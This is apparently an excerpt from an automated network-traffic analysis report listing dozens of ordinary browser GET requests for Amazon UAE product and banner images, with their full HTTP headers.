    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b077n51cr2_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31qnSUxnD0L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31iocnwzJSL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31J42iPc2iL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186._SY116_CB642007527_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763815_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763856_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186._SY116_CB642007526_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NGI2NmQ3NTEt-w186._SY116_CB642007527_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-OTg1MGY5MmMt-w186._SY116_CB642007527_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31vRRFcgseL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/317I8lSNZAL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_18_BTS24_AE_GW_QC-CROSSA_DQC_CL_Beauty_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_19_BTS24_AE_GW_QC-CROSSA_DQC_CL_PersonalCare_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621419_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621420_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621421_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621422_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31uinBOk0cL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_20_BTS24_AE_GW_QC-CROSSA_DQC_CL_Nutrition_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_21_BTS24_AE_GW_QC-CROSSA_DQC_CL_BeautyAppliances_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-3lpvr-noc3q_372x232_ae-en._SY116_CB608574218_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-uw1qk_372x232_ae-en._SY116_CB608574221_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_dqc-storage_372x232_ae-en._SY116_CB608574222_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_dqc-monitor_372x232_ae-en._SY116_CB608574213_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986215_UAE_Budget_Store_AE_xsite_bubbler_generic_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986221_UAE_Budget_Store_AE_xsite_electronics_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31PZG2Tr2YL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41C83Jg7PlL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07yk48157_379x304_ae-en._SY116_CB623005781_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07fsr5k7g_379x304_ae-en._SY116_CB623005785_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcar_b07pcm7ds2_379x304_ae-en._SY116_CB623005780_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b09774kt11_379x304_ae-en._SY116_CB623005781_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Stores/BudgetStore/2404DR14_3__AE_GW_DC_ElectronicsBudget_379x304._SY304_CB554784697_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334867_186x116_1X_en_AE_1._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2022/img/Events/XCM_Manual_1463368_4956629_400x400_2X._CB609908562_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986213_UAE_Budget_Store_AE_xsite_bubbler_beauty_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986217_UAE_Budget_Store_AE_xsite_bubbler_HPC_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986225_UAE_Budget_Store_AE_xsite_home_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986229_UAE_Budget_Store_AE_xsite_toys_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YjI1NWNkYTQt-w379._SY304_CB641947165_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334872_186x116_1X_en_AE_3._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334873_186x116_1X_en_AE_2._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334875_186x116_1X_en_AE_4._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
